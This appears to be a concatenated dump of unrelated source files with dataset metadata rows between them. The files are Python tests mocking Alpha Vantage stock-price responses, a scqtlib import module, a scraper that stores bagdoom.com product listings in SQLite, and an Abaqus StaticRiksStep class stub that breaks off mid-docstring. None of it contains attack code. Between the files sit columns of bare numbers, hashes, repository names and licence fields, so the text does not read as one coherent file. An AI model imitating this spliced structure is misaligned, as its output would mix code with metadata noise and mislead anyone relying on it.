        ``timestamps``: three 'YYYY-MM-DD HH:MM:SS' strings, oldest first.
        """
        bars = [
            (stamp, self._bar(*prices))
            for stamp, prices in zip(timestamps, self._INTRADAY_PRICES)
        ]
        payload = self._make_payload("AAPL", interval, timestamps[0], timestamps[-1])
        responses.add(
            responses.GET,
            "https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY"
            f"&symbol=AAPL&interval={interval}&outputsize=full&apikey=demo&datatype=json",
            json={
                "Meta Data": {
                    "1. Information": f"Intraday ({interval}) open, high, low, close prices and volume",
                    "2. Symbol": "AAPL",
                    "3. Last Refreshed": timestamps[-1],
                    "4. Interval": interval,
                    "5. Output Size": "Full size",
                    "6. Time Zone": "US/Eastern",
                },
                # The API reports newest first; the block must re-sort.
                f"Time Series ({interval})": dict(reversed(bars)),
            },
            status=200,
        )
        self.assertDictEqual(
            event_ingestor(payload), {"response": self._expected_rows(bars)}
        )

    def _run_series_ok(self, url, series_key, meta, payload, bars):
        """Mock a daily/weekly/monthly endpoint and assert the parsed result."""
        responses.add(
            responses.GET,
            url,
            json={"Meta Data": meta, series_key: dict(reversed(bars))},
            status=200,
        )
        self.assertDictEqual(
            event_ingestor(payload), {"response": self._expected_rows(bars)}
        )

    # ------------------------------------------------------------------
    # Intraday happy paths, one per supported candlestick.
    # ------------------------------------------------------------------

    @responses.activate
    def test_get_intraday_1min_data_ok(self):
        self._run_intraday_ok(
            "1min",
            ["2021-06-21 19:58:00", "2021-06-21 19:59:00", "2021-06-21 20:00:00"],
        )

    @responses.activate
    def test_get_intraday_5min_data_ok(self):
        self._run_intraday_ok(
            "5min",
            ["2021-06-21 19:50:00", "2021-06-21 19:55:00", "2021-06-21 20:00:00"],
        )

    @responses.activate
    def test_get_intraday_15min_data_ok(self):
        self._run_intraday_ok(
            "15min",
            ["2021-06-21 19:30:00", "2021-06-21 19:45:00", "2021-06-21 20:00:00"],
        )

    @responses.activate
    def test_get_intraday_30min_data_ok(self):
        self._run_intraday_ok(
            "30min",
            ["2021-06-21 19:00:00", "2021-06-21 19:30:00", "2021-06-21 20:00:00"],
        )

    @responses.activate
    def test_get_intraday_60min_data_ok(self):
        self._run_intraday_ok(
            "60min",
            ["2021-06-21 18:00:00", "2021-06-21 19:00:00", "2021-06-21 20:00:00"],
        )

    @responses.activate
    def test_get_intraday_data_error_cannot_find_ticker(self):
        # An "Error Message" body (unknown ticker) must yield an empty list.
        payload = self._make_payload(
            "TICKER_DNE", "1min", "2021-06-21 19:58:00", "2021-06-21 20:00:00"
        )
        responses.add(
            responses.GET,
            "https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY"
            "&symbol=TICKER_DNE&interval=1min&outputsize=full&apikey=demo&datatype=json",
            json={
                "Error Message": "Invalid API call. Please retry or visit the documentation (https://www.alphavantage.co/documentation/) for TIME_SERIES_INTRADAY."
            },
            status=200,
        )
        self.assertDictEqual(event_ingestor(payload), {"response": []})

    # ------------------------------------------------------------------
    # Daily / weekly / monthly happy paths.
    # ------------------------------------------------------------------

    @responses.activate
    def test_get_daily_adjusted_data_ok(self):
        bars = [
            ("2021-06-18", self._bar("130.7100", "131.5100", "130.2400", "130.4600", "108953309")),
            ("2021-06-21", self._bar("130.3000", "132.4100", "129.2100", "132.3000", "79663316")),
            ("2021-06-22", self._bar("132.1300", "134.0800", "131.6200", "133.9800", "74783618")),
        ]
        self._run_series_ok(
            "https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=AAPL&outputsize=full&apikey=demo&datatype=json",
            "Time Series (Daily)",
            {
                "1. Information": "Daily Prices (open, high, low, close) and Volumes",
                "2. Symbol": "AAPL",
                "3. Last Refreshed": "2021-06-22",
                "4. Output Size": "Full size",
                "5. Time Zone": "US/Eastern",
            },
            self._make_payload("AAPL", "1day", "2021-06-18 00:00:00", "2021-06-22 00:00:00"),
            bars,
        )

    @responses.activate
    def test_get_weekly_data_ok(self):
        bars = [
            ("2021-07-16", self._bar("141.4300", "141.9599", "138.5900", "138.9000", "18659679")),
            ("2021-07-23", self._bar("136.4500", "144.9200", "136.2089", "141.3400", "34786264")),
            ("2021-07-30", self._bar("141.3900", "143.6400", "140.7900", "140.9600", "16120616")),
        ]
        self._run_series_ok(
            "https://www.alphavantage.co/query?function=TIME_SERIES_WEEKLY&symbol=IBM&apikey=demo&datatype=json",
            "Weekly Time Series",
            {
                "1. Information": "Weekly Prices (open, high, low, close) and Volumes",
                "2. Symbol": "IBM",
                "3. Last Refreshed": "2021-07-30",
                "4. Time Zone": "US/Eastern",
            },
            self._make_payload("IBM", "1week", "2021-07-16 00:00:00", "2021-07-30 00:00:00"),
            bars,
        )

    @responses.activate
    def test_get_monthly_data_ok(self):
        bars = [
            ("2021-05-28", self._bar("143.8100", "148.5150", "140.9200", "143.7400", "98036425")),
            ("2021-06-30", self._bar("145.0000", "152.8400", "143.0400", "146.5900", "84365220")),
            ("2021-07-30", self._bar("146.9600", "147.5000", "136.2089", "140.9600", "110625907")),
        ]
        self._run_series_ok(
            "https://www.alphavantage.co/query?function=TIME_SERIES_MONTHLY&symbol=IBM&apikey=demo&datatype=json",
            "Monthly Time Series",
            {
                "1. Information": "Monthly Prices (open, high, low, close) and Volumes",
                "2. Symbol": "IBM",
                "3. Last Refreshed": "2021-07-30",
                "4. Time Zone": "US/Eastern",
            },
            self._make_payload("IBM", "1month", "2021-05-28 00:00:00", "2021-07-30 00:00:00"),
            bars,
        )

    @responses.activate
    def test_get_daily_adjusted_data_error_cannot_find_ticker(self):
        payload = self._make_payload(
            "TICKER_DNE", "1day", "2021-06-18 00:00:00", "2021-06-22 00:00:00"
        )
        responses.add(
            responses.GET,
            "https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=TICKER_DNE&outputsize=full&apikey=demo&datatype=json",
            json={
                "Error Message": "Invalid API call. Please retry or visit the documentation (https://www.alphavantage.co/documentation/) for TIME_SERIES_INTRADAY."
            },
            status=200,
        )
        self.assertDictEqual(event_ingestor(payload), {"response": []})

    # ------------------------------------------------------------------
    # Payload-validation failures (no HTTP mocking needed).
    # ------------------------------------------------------------------

    def test_failure_missing_candlestick_input(self):
        # "candlestick" missing entirely -> invalid-payload exception.
        payload = {
            **self.payload,
            "inputs": {
                "equity_name": "IBM",
                "start_date": "2021-06-18 00:00:00",
                "end_date": "2021-06-22 00:00:00",
            },
            "outputs": {},
        }
        with self.assertRaises(DataBlockOneInvalidInputPayloadException):
            event_ingestor(payload)

    def test_failure_invalid_candlestick_frequency(self):
        # Unknown candlestick value -> invalid-candlestick exception.
        with self.assertRaises(DataBlockOneInvalidCandlestickException):
            event_ingestor(
                self._make_payload(
                    "IBM", "INVALID", "2021-06-18 00:00:00", "2021-06-22 00:00:00"
                )
            )
| 35.6
| 163
| 0.353073
| 2,472
| 30,260
| 4.257686
| 0.112055
| 0.036485
| 0.025083
| 0.028884
| 0.785653
| 0.776912
| 0.748694
| 0.744323
| 0.729311
| 0.718575
| 0
| 0.2036
| 0.511599
| 30,260
| 849
| 164
| 35.641932
| 0.508559
| 0.001355
| 0
| 0.524715
| 0
| 0.017744
| 0.286461
| 0.028461
| 0
| 0
| 0
| 0.001178
| 0.019011
| 1
| 0.021546
| false
| 0.001267
| 0.00507
| 0
| 0.029151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
de504515503229eb2f54aff686fc9f55b107d8bd
| 97
|
py
|
Python
|
scqtlib/plots/__init__.py
|
huangyh09/scQTLib
|
d0d704ab42704d97f780d707626a4f6a6558dd93
|
[
"Apache-2.0"
] | null | null | null |
scqtlib/plots/__init__.py
|
huangyh09/scQTLib
|
d0d704ab42704d97f780d707626a4f6a6558dd93
|
[
"Apache-2.0"
] | null | null | null |
scqtlib/plots/__init__.py
|
huangyh09/scQTLib
|
d0d704ab42704d97f780d707626a4f6a6558dd93
|
[
"Apache-2.0"
] | 1
|
2022-01-07T06:49:45.000Z
|
2022-01-07T06:49:45.000Z
|
from .base_plot import Gboxplot, scatter_adata
from .base_plot import wzhu_colors, vega_20_scanpy
| 48.5
| 50
| 0.865979
| 16
| 97
| 4.875
| 0.75
| 0.205128
| 0.307692
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022727
| 0.092784
| 97
| 2
| 50
| 48.5
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
dec483e338d7dcbde0fe0a9f844998abe3498390
| 6,852
|
py
|
Python
|
website/templates/database.py
|
fahad-rewon/SELab
|
431bcf827177d6ba7a5761e58f773b2031bbb79b
|
[
"MIT"
] | null | null | null |
website/templates/database.py
|
fahad-rewon/SELab
|
431bcf827177d6ba7a5761e58f773b2031bbb79b
|
[
"MIT"
] | null | null | null |
website/templates/database.py
|
fahad-rewon/SELab
|
431bcf827177d6ba7a5761e58f773b2031bbb79b
|
[
"MIT"
] | null | null | null |
import sqlite3
from bs4 import BeautifulSoup
import requests

# Create a database in RAM
# db = sqlite3.connect(':memory:')

# Creates or opens a file called mydb with a SQLite3 DB.
try:
    # Raw string: in the original plain literal, '\s' and '\m' were fragile
    # escape sequences that only worked by accident.
    db = sqlite3.connect(r'C:\sqlite\mydb.db')
    cursor = db.cursor()
    # Get a cursor object
    cursor.execute('''
        CREATE TABLE IF NOT EXISTS product(product_id INTEGER PRIMARY KEY, product_name TEXT,
                           web_link TEXT, image_link TEXT)
    ''')
    db.commit()
except sqlite3.Error:
    # Narrowed from a bare except: only database errors are expected here.
    print('table already exists1')
finally:
    product_id = 0


def _scrape_category(count_url, page_base, next_product_id):
    """Scrape every listing page of one bagdoom category into the product table.

    count_url        -- page fetched first to read the total product count
    page_base        -- listing URL prefix; the page number is appended
    next_product_id  -- first free primary-key value for this category

    Returns the next free product_id after all rows have been inserted.
    Uses the module-level `db` and `cursor`, and prints progress exactly like
    the original per-category sections did.
    """
    source = requests.get(count_url).text
    soup = BeautifulSoup(source, 'lxml')
    productAmountText = soup.find('p', class_='amount').text
    print(productAmountText)
    # 33rd index has amount of products -- site-specific layout assumption;
    # breaks if bagdoom changes the "amount" paragraph wording.
    productAmount = productAmountText.split(' ')[33]
    print(productAmount)
    amount = int(productAmount)  # string to int
    print(amount)
    totalPage = int(amount / 60) + 1  # 60 products per listing page
    print(totalPage)

    page_no = 0
    while page_no < totalPage:
        page_no = page_no + 1
        pageRef = page_base + str(page_no)
        source = requests.get(pageRef).text
        soup = BeautifulSoup(source, 'lxml')
        allProducts = soup.find('ul', class_='products-grid first')
        counter = 0
        for singleProduct in allProducts.find_all('a', class_='product-image'):
            singleProductRef = singleProduct['href']
            singleProductTitle = singleProduct['title']
            singleProductImage = singleProduct.img['src']
            counter = counter + 1
            print(singleProductRef)
            print(singleProductTitle)
            print(singleProductImage)
            print()
            # Parameterized insert (unchanged from original) keeps titles with
            # quotes/special characters safe.
            cursor.execute(''' INSERT INTO product(product_id, product_name, web_link, image_link)
                        VALUES (?, ?, ?, ?)''',
                           (next_product_id, singleProductTitle, singleProductRef, singleProductImage))
            db.commit()
            next_product_id = next_product_id + 1  # also primary key for the database
        print(counter)
        print(page_no)
    return next_product_id


# men clothing scraper bagdoom
product_id = _scrape_category('https://www.bagdoom.com/men/clothing',
                              'https://www.bagdoom.com/men/clothing.html?p=',
                              product_id)

# women clothing scraper bagdoom
product_id = _scrape_category('https://www.bagdoom.com/women/clothing.html?p=1',
                              'https://www.bagdoom.com/women/clothing.html?p=',
                              product_id)

# mobile scraper bagdoom
product_id = _scrape_category('https://www.bagdoom.com/electronics/mobiles-tabs/mobiles.html?p=1',
                              'https://www.bagdoom.com/electronics/mobiles-tabs/mobiles.html?p=',
                              product_id)

db.close()
| 35.6875
| 112
| 0.610479
| 704
| 6,852
| 5.849432
| 0.166193
| 0.026226
| 0.037882
| 0.052453
| 0.865712
| 0.843856
| 0.821515
| 0.821515
| 0.815202
| 0.815202
| 0
| 0.008998
| 0.27014
| 6,852
| 192
| 113
| 35.6875
| 0.814437
| 0.210158
| 0
| 0.817391
| 0
| 0.008696
| 0.193118
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026087
| 0
| 0.026087
| 0.269565
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a0f5e95fa3668ab917b7633aac371c6c285a04e7
| 27,058
|
py
|
Python
|
src/abaqus/Step/StaticRiksStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/Step/StaticRiksStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/Step/StaticRiksStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
from .AnalysisStep import AnalysisStep
from ..Adaptivity.AdaptiveMeshConstraintState import AdaptiveMeshConstraintState
from ..Adaptivity.AdaptiveMeshDomain import AdaptiveMeshDomain
from ..BoundaryCondition.BoundaryConditionState import BoundaryConditionState
from ..Load.LoadCase import LoadCase
from ..Load.LoadState import LoadState
from ..PredefinedField.PredefinedFieldState import PredefinedFieldState
from ..Region.Region import Region
from ..StepMiscellaneous.Control import Control
from ..StepMiscellaneous.SolverControl import SolverControl
from ..StepOutput.DiagnosticPrint import DiagnosticPrint
from ..StepOutput.FieldOutputRequestState import FieldOutputRequestState
from ..StepOutput.HistoryOutputRequestState import HistoryOutputRequestState
from ..StepOutput.Monitor import Monitor
from ..StepOutput.Restart import Restart
class StaticRiksStep(AnalysisStep):
    """The StaticRiksStep object is used to indicate that the step should be analyzed as a
    static load step using the modified Riks method for proportional loading cases.
    The StaticRiksStep object is derived from the AnalysisStep object.

    Attributes
    ----------
    name: str
        A String specifying the repository key.
    nlgeom: Boolean
        A Boolean specifying whether to allow for geometric nonlinearity. The default value is
        OFF.
    adiabatic: Boolean
        A Boolean specifying whether to perform an adiabatic stress analysis. The default value
        is OFF.
    maxLPF: float
        None or a Float specifying the maximum value of the load proportionality factor. The
        default value is None.
    nodeOn: Boolean
        A Boolean specifying whether to monitor the finishing displacement value at a node. The
        default value is OFF.
    maximumDisplacement: float
        A Float specifying the value of the total displacement (or rotation) at the node and
        degree of freedom that, if crossed during an increment, ends the step at the current
        increment. This argument is required when **nodeOn=ON**. The default value is 0.0.
    dof: int
        An Int specifying the degree of freedom being monitored. This argument is required when
        **nodeOn=ON**. The default value is 0.
    timeIncrementationMethod: SymbolicConstant
        A SymbolicConstant specifying the time incrementation method to be used. Possible values
        are FIXED and AUTOMATIC. The default value is AUTOMATIC.
    maxNumInc: int
        An Int specifying the maximum number of increments in a step. The default value is 100.
    totalArcLength: float
        A Float specifying the total load proportionality factor associated with the load in
        this step. The default value is 1.0.
    initialArcInc: float
        A Float specifying the initial load proportionality factor. The default value is the
        total load proportionality factor for the step.
    minArcInc: float
        A Float specifying the minimum arc length increment allowed. The default value is the
        smaller of the suggested initial load proportionality factor or 10−5 times the total
        load proportionality factor for the step.
    maxArcInc: float
        A Float specifying the maximum arc length increment allowed. The default value is the
        total load proportionality factor for the step.
    matrixStorage: SymbolicConstant
        A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
        UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
    extrapolation: SymbolicConstant
        A SymbolicConstant specifying the type of extrapolation to use in determining the
        incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
        PARABOLIC. The default value is LINEAR.
    noStop: Boolean
        A Boolean specifying whether to accept the solution to an increment after the maximum
        number of iterations allowed have been completed, even if the equilibrium tolerances are
        not satisfied. The default value is OFF.Warning:You should set **noStop=ON** only in
        special cases when you have a thorough understanding of how to interpret the results.
    useLongTermSolution: Boolean
        A Boolean specifying whether to obtain the fully relaxed long-term elastic solution with
        time-domain viscoelasticity or the long-term elastic-Plastic solution for two-layer
        viscoplasticity. The default value is OFF.
    convertSDI: SymbolicConstant
        A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
        occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
        CONVERT_SDI_ON. The default value is PROPAGATED.
    previous: str
        A String specifying the name of the previous step. The new step appears after this step
        in the list of analysis steps.
    description: str
        A String specifying a description of the new step. The default value is an empty string.
    fullyPlastic: str
        A String specifying the name of the region being monitored for fully Plastic behavior.
        The default value is an empty string.
    region: Region
        A :py:class:`~abaqus.Region.Region.Region` object specifying the vertex at which the finishing displacement value is being
        monitored. This argument is required when **nodeOn=ON**.
    explicit: SymbolicConstant
        A SymbolicConstant specifying whether the step has an explicit procedure type
        (**procedureType=ANNEAL**, DYNAMIC_EXPLICIT, or DYNAMIC_TEMP_DISPLACEMENT).
    perturbation: Boolean
        A Boolean specifying whether the step has a perturbation procedure type.
    nonmechanical: Boolean
        A Boolean specifying whether the step has a mechanical procedure type.
        (NOTE(review): wording looks inverted relative to the attribute name
        ``nonmechanical`` — confirm against the upstream Abaqus documentation.)
    procedureType: SymbolicConstant
        A SymbolicConstant specifying the Abaqus procedure. Possible values are:
        - ANNEAL
        - BUCKLE
        - COMPLEX_FREQUENCY
        - COUPLED_TEMP_DISPLACEMENT
        - COUPLED_THERMAL_ELECTRIC
        - DIRECT_CYCLIC
        - DYNAMIC_IMPLICIT
        - DYNAMIC_EXPLICIT
        - DYNAMIC_SUBSPACE
        - DYNAMIC_TEMP_DISPLACEMENT
        - COUPLED_THERMAL_ELECTRICAL_STRUCTURAL
        - FREQUENCY
        - GEOSTATIC
        - HEAT_TRANSFER
        - MASS_DIFFUSION
        - MODAL_DYNAMICS
        - RANDOM_RESPONSE
        - RESPONSE_SPECTRUM
        - SOILS
        - STATIC_GENERAL
        - STATIC_LINEAR_PERTURBATION
        - STATIC_RIKS
        - STEADY_STATE_DIRECT
        - STEADY_STATE_MODAL
        - STEADY_STATE_SUBSPACE
        - VISCO
    suppressed: Boolean
        A Boolean specifying whether the step is suppressed or not. The default value is OFF.
    fieldOutputRequestState: dict[str, FieldOutputRequestState]
        A repository of :py:class:`~abaqus.StepOutput.FieldOutputRequestState.FieldOutputRequestState` objects.
    historyOutputRequestState: dict[str, HistoryOutputRequestState]
        A repository of :py:class:`~abaqus.StepOutput.HistoryOutputRequestState.HistoryOutputRequestState` objects.
    diagnosticPrint: DiagnosticPrint
        A :py:class:`~abaqus.StepOutput.DiagnosticPrint.DiagnosticPrint` object.
    monitor: Monitor
        A :py:class:`~abaqus.StepOutput.Monitor.Monitor` object.
    restart: Restart
        A :py:class:`~abaqus.StepOutput.Restart.Restart` object.
    adaptiveMeshConstraintStates: dict[str, AdaptiveMeshConstraintState]
        A repository of :py:class:`~abaqus.Adaptivity.AdaptiveMeshConstraintState.AdaptiveMeshConstraintState` objects.
    adaptiveMeshDomains: dict[str, AdaptiveMeshDomain]
        A repository of :py:class:`~abaqus.Adaptivity.AdaptiveMeshDomain.AdaptiveMeshDomain` objects.
    control: Control
        A :py:class:`~abaqus.StepMiscellaneous.Control.Control` object.
    solverControl: SolverControl
        A :py:class:`~abaqus.StepMiscellaneous.SolverControl.SolverControl` object.
    boundaryConditionStates: dict[str, BoundaryConditionState]
        A repository of :py:class:`~abaqus.BoundaryCondition.BoundaryConditionState.BoundaryConditionState` objects.
    interactionStates: int
        A repository of :py:class:`~abaqus.Interaction.InteractionState.InteractionState` objects.
    loadStates: dict[str, LoadState]
        A repository of :py:class:`~abaqus.Load.LoadState.LoadState` objects.
    loadCases: dict[str, LoadCase]
        A repository of :py:class:`~abaqus.Load.LoadCase.LoadCase` objects.
    predefinedFieldStates: dict[str, PredefinedFieldState]
        A repository of :py:class:`~abaqus.PredefinedField.PredefinedFieldState.PredefinedFieldState` objects.

    Notes
    -----
    This object can be accessed by:

    .. code-block:: python

        import step
        mdb.models[name].steps[name]

    The corresponding analysis keywords are:
    - STATIC
    - STEP
    """

    # A String specifying the repository key.
    name: str = ''

    # A Boolean specifying whether to allow for geometric nonlinearity. The default value is
    # OFF.
    nlgeom: Boolean = OFF

    # A Boolean specifying whether to perform an adiabatic stress analysis. The default value
    # is OFF.
    adiabatic: Boolean = OFF

    # None or a Float specifying the maximum value of the load proportionality factor. The
    # default value is None.
    maxLPF: float = None

    # A Boolean specifying whether to monitor the finishing displacement value at a node. The
    # default value is OFF.
    nodeOn: Boolean = OFF

    # A Float specifying the value of the total displacement (or rotation) at the node and
    # degree of freedom that, if crossed during an increment, ends the step at the current
    # increment. This argument is required when *nodeOn*=ON. The default value is 0.0.
    maximumDisplacement: float = 0

    # An Int specifying the degree of freedom being monitored. This argument is required when
    # *nodeOn*=ON. The default value is 0.
    dof: int = 0

    # A SymbolicConstant specifying the time incrementation method to be used. Possible values
    # are FIXED and AUTOMATIC. The default value is AUTOMATIC.
    timeIncrementationMethod: SymbolicConstant = AUTOMATIC

    # An Int specifying the maximum number of increments in a step. The default value is 100.
    maxNumInc: int = 100

    # A Float specifying the total load proportionality factor associated with the load in
    # this step. The default value is 1.0.
    totalArcLength: float = 1

    # A Float specifying the initial load proportionality factor. The default value is the
    # total load proportionality factor for the step.
    initialArcInc: float = None

    # A Float specifying the minimum arc length increment allowed. The default value is the
    # smaller of the suggested initial load proportionality factor or 10−5 times the total
    # load proportionality factor for the step.
    minArcInc: float = None

    # A Float specifying the maximum arc length increment allowed. The default value is the
    # total load proportionality factor for the step.
    maxArcInc: float = None

    # A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
    # UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
    matrixStorage: SymbolicConstant = SOLVER_DEFAULT

    # A SymbolicConstant specifying the type of extrapolation to use in determining the
    # incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
    # PARABOLIC. The default value is LINEAR.
    extrapolation: SymbolicConstant = LINEAR

    # A Boolean specifying whether to accept the solution to an increment after the maximum
    # number of iterations allowed have been completed, even if the equilibrium tolerances are
    # not satisfied. The default value is OFF.Warning:You should set *noStop*=ON only in
    # special cases when you have a thorough understanding of how to interpret the results.
    noStop: Boolean = OFF

    # A Boolean specifying whether to obtain the fully relaxed long-term elastic solution with
    # time-domain viscoelasticity or the long-term elastic-Plastic solution for two-layer
    # viscoplasticity. The default value is OFF.
    useLongTermSolution: Boolean = OFF

    # A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
    # occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
    # CONVERT_SDI_ON. The default value is PROPAGATED.
    convertSDI: SymbolicConstant = PROPAGATED

    # A String specifying the name of the previous step. The new step appears after this step
    # in the list of analysis steps.
    previous: str = ''

    # A String specifying a description of the new step. The default value is an empty string.
    description: str = ''

    # A String specifying the name of the region being monitored for fully Plastic behavior.
    # The default value is an empty string.
    fullyPlastic: str = ''

    # A Region object specifying the vertex at which the finishing displacement value is being
    # monitored. This argument is required when *nodeOn*=ON.
    region: Region = Region()

    # A SymbolicConstant specifying whether the step has an explicit procedure type
    # (*procedureType*=ANNEAL, DYNAMIC_EXPLICIT, or DYNAMIC_TEMP_DISPLACEMENT).
    explicit: SymbolicConstant = None

    # A Boolean specifying whether the step has a perturbation procedure type.
    perturbation: Boolean = OFF

    # A Boolean specifying whether the step has a mechanical procedure type.
    # NOTE(review): upstream wording conflicts with the name "nonmechanical" — confirm.
    nonmechanical: Boolean = OFF

    # A SymbolicConstant specifying the Abaqus procedure. Possible values are:
    # - ANNEAL
    # - BUCKLE
    # - COMPLEX_FREQUENCY
    # - COUPLED_TEMP_DISPLACEMENT
    # - COUPLED_THERMAL_ELECTRIC
    # - DIRECT_CYCLIC
    # - DYNAMIC_IMPLICIT
    # - DYNAMIC_EXPLICIT
    # - DYNAMIC_SUBSPACE
    # - DYNAMIC_TEMP_DISPLACEMENT
    # - COUPLED_THERMAL_ELECTRICAL_STRUCTURAL
    # - FREQUENCY
    # - GEOSTATIC
    # - HEAT_TRANSFER
    # - MASS_DIFFUSION
    # - MODAL_DYNAMICS
    # - RANDOM_RESPONSE
    # - RESPONSE_SPECTRUM
    # - SOILS
    # - STATIC_GENERAL
    # - STATIC_LINEAR_PERTURBATION
    # - STATIC_RIKS
    # - STEADY_STATE_DIRECT
    # - STEADY_STATE_MODAL
    # - STEADY_STATE_SUBSPACE
    # - VISCO
    procedureType: SymbolicConstant = None

    # A Boolean specifying whether the step is suppressed or not. The default value is OFF.
    suppressed: Boolean = OFF

    # A repository of FieldOutputRequestState objects.
    # (dict[str, X]() calls the generic alias and simply returns an empty dict.)
    fieldOutputRequestState: dict[str, FieldOutputRequestState] = dict[str, FieldOutputRequestState]()

    # A repository of HistoryOutputRequestState objects.
    historyOutputRequestState: dict[str, HistoryOutputRequestState] = dict[str, HistoryOutputRequestState]()

    # A DiagnosticPrint object.
    diagnosticPrint: DiagnosticPrint = DiagnosticPrint()

    # A Monitor object.
    monitor: Monitor = None

    # A Restart object.
    restart: Restart = Restart()

    # A repository of AdaptiveMeshConstraintState objects.
    adaptiveMeshConstraintStates: dict[str, AdaptiveMeshConstraintState] = dict[
        str, AdaptiveMeshConstraintState]()

    # A repository of AdaptiveMeshDomain objects.
    adaptiveMeshDomains: dict[str, AdaptiveMeshDomain] = dict[str, AdaptiveMeshDomain]()

    # A Control object.
    control: Control = Control()

    # A SolverControl object.
    solverControl: SolverControl = SolverControl()

    # A repository of BoundaryConditionState objects.
    boundaryConditionStates: dict[str, BoundaryConditionState] = dict[str, BoundaryConditionState]()

    # A repository of InteractionState objects.
    interactionStates: int = None

    # A repository of LoadState objects.
    loadStates: dict[str, LoadState] = dict[str, LoadState]()

    # A repository of LoadCase objects.
    loadCases: dict[str, LoadCase] = dict[str, LoadCase]()

    # A repository of PredefinedFieldState objects.
    predefinedFieldStates: dict[str, PredefinedFieldState] = dict[str, PredefinedFieldState]()

    def __init__(self, name: str, previous: str, description: str = '', nlgeom: Boolean = OFF,
                 adiabatic: Boolean = OFF, maxLPF: float = None, nodeOn: Boolean = OFF,
                 maximumDisplacement: float = 0, dof: int = 0, region: Region = Region(),
                 timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
                 totalArcLength: float = 1, initialArcInc: float = None, minArcInc: float = None,
                 maxArcInc: float = None, matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
                 extrapolation: SymbolicConstant = LINEAR, fullyPlastic: str = '', noStop: Boolean = OFF,
                 maintainAttributes: Boolean = False, useLongTermSolution: Boolean = OFF,
                 convertSDI: SymbolicConstant = PROPAGATED):
        """This method creates a StaticRiksStep object.

        Notes
        -----
        This function can be accessed by:

        .. code-block:: python

            mdb.models[name].StaticRiksStep

        Parameters
        ----------
        name
            A String specifying the repository key.
        previous
            A String specifying the name of the previous step. The new step appears after this step
            in the list of analysis steps.
        description
            A String specifying a description of the new step. The default value is an empty string.
        nlgeom
            A Boolean specifying whether to allow for geometric nonlinearity. The default value is
            OFF.
        adiabatic
            A Boolean specifying whether to perform an adiabatic stress analysis. The default value
            is OFF.
        maxLPF
            None or a Float specifying the maximum value of the load proportionality factor. The
            default value is None.
        nodeOn
            A Boolean specifying whether to monitor the finishing displacement value at a node. The
            default value is OFF.
        maximumDisplacement
            A Float specifying the value of the total displacement (or rotation) at the node and
            degree of freedom that, if crossed during an increment, ends the step at the current
            increment. This argument is required when *nodeOn*=ON. The default value is 0.0.
        dof
            An Int specifying the degree of freedom being monitored. This argument is required when
            *nodeOn*=ON. The default value is 0.
        region
            A Region object specifying the vertex at which the finishing displacement value is being
            monitored. This argument is required when *nodeOn*=ON.
        timeIncrementationMethod
            A SymbolicConstant specifying the time incrementation method to be used. Possible values
            are FIXED and AUTOMATIC. The default value is AUTOMATIC.
        maxNumInc
            An Int specifying the maximum number of increments in a step. The default value is 100.
        totalArcLength
            A Float specifying the total load proportionality factor associated with the load in
            this step. The default value is 1.0.
        initialArcInc
            A Float specifying the initial load proportionality factor. The default value is the
            total load proportionality factor for the step.
        minArcInc
            A Float specifying the minimum arc length increment allowed. The default value is the
            smaller of the suggested initial load proportionality factor or 10−5 times the total
            load proportionality factor for the step.
        maxArcInc
            A Float specifying the maximum arc length increment allowed. The default value is the
            total load proportionality factor for the step.
        matrixStorage
            A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
            UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
        extrapolation
            A SymbolicConstant specifying the type of extrapolation to use in determining the
            incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
            PARABOLIC. The default value is LINEAR.
        fullyPlastic
            A String specifying the name of the region being monitored for fully Plastic behavior.
            The default value is an empty string.
        noStop
